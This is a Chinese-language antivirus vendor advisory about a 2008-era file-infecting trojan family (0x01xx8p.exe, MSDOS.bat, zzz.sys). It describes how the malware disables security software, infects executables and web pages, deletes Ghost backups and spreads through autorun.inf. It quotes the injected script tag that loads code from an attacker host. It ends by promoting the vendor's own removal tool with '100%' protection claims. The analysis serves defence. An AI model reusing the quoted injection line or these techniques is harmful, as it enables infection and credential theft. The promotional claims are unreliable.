查殺木馬0x01xx8p.exe,Windows.ext,MSDOS.bat,zzz.sys

原創,轉載需注明出處:

根據我們蜜罐這網絡反饋的情況,0x01xx8p.exe,Windows.ext,MSDOS.bat,zzz.sys這些病毒成爲4-5月份感染用戶電腦的主力。力壓機器狗和磁碟機病毒,成了現在名副其實的新毒王,這些病毒會遍曆磁碟，感染全部的正常檔案以及html網頁檔案，並試圖關閉安全軟體。接著，它連接病毒作者指定的服務器，下載其它的盜號木馬到用戶電腦中運行。

病毒現象:

1. 判斷自己是否是在系統盤下的MSDOS.bat,如果是的話會將系統盤目錄打開,創建目錄C:\windows\Tasks,刪除Task目錄下的0x01xx8p.exe檔案,將自身複制爲c:\windows\Tasks\0x01xx8p.exe檔案.

2. 創建一個線程,每隔1秒就設置一下系統時間爲2000年1月1日,主要是爲了讓
卡巴斯基殺毒軟體失效.

3. 複制自身到C:\spoolsv.exe,C:\windows\Tasks\spoolsv.ext ,C:\windows\Tasks\SysFile.brk,並刪除自身檔案.感染explorer.exe,先在C:\windows\tasks\釋放被感染的explorer.ext 然後再保存到C:\windows\explorer.exe

4. 將要感染的病毒代碼賦值到緩存,將被感染檔案的最後一個節改名爲.WYCao,注入被感染代碼和自身病毒體,感染成功後替換原檔案,修改注冊表破壞隱藏檔案的顯示.

5.訪問http://c.1**dm.com/config.txt然後拷貝到c:\windows\system32\windows.txt和c:\windows\system32\config.txt,按照windows.txt裏的配置地址,下載很多盜號木馬，複制到c:\windows\system32\ 並重命名爲*.ext (*=a1,a2,a3…) 然後運行c:\windows\system32\*.ext.

6. 遍曆進程判斷是否存在如下進程, avp.exe, kvsrvxp.exe, kissvc.exe,如果存在的話則強制結束.

7.感染xml/cgi/jsp/php/aspx/asp/shtml/shtm/html/htm檔案加入<script language="JavaScript" src=http://c.1**dm.com/one/arp.js></script>，刪除所有的.gho檔案。感染系統目錄以外的scr/com/cmd/bat/exe.

8.釋放C:\zzz.sys，創建服務加載,直接控制硬碟,破掉還原系統,這一點對網吧破壞極大.

9.遍曆固定磁碟和可移動磁碟，在各個分區根目錄下創建隱藏的系統屬性檔案autorun.inf和MSDOS.BAT.利用autorun.inf檔案特性,用戶打開磁碟就會中毒.

病毒分析:

該病毒利用了以前很多病毒的破壞性,有autorun.inf感染,感染exe檔案,感染html檔案,
修改系統時間,終止反病毒軟體進程,破壞還原系統,刪除用戶的ghost備份檔案,下載大量
盜號木馬來竊取用戶的QQ密碼以及網絡遊戲密碼,所以個人用戶感染後手工是不可能清除
的,只有借助反病毒軟體清除.

如何預防這些木馬病毒:

根據我們監測,這些木馬主要是放在網頁上,利用realplayer和IE浏覽器的漏洞感染用戶電腦,木馬清除大師2008 100%防範網頁木馬和realplayer漏洞木馬,所以安裝有木馬清除大師2008的電腦不會受這些木馬的襲擊.

防範Realplayer木馬:http://www.lofocus.com/big5/News/20071229171218.html

100%防範網頁木馬:http://www.lofocus.com/big5/News/2007111141815.html


查殺這些木馬病毒:

個人用戶感染這些木馬後手工查殺是不可能的,只有借助反病毒軟體清除,目前木馬清除大師2008能完整清除這些木馬及其變種,下載地址:http://www.lofocus.com/big5/download


最好進入安全模式使用木馬清除大師2008全面掃描,並手工修改注冊表恢複查看隱藏檔案:

修改注冊表查看隱藏檔案:http://www.lofocus.com/News/20071129142754.html

怎樣進入安全模式:http://www.lofocus.com/big5/News/20071024123538.html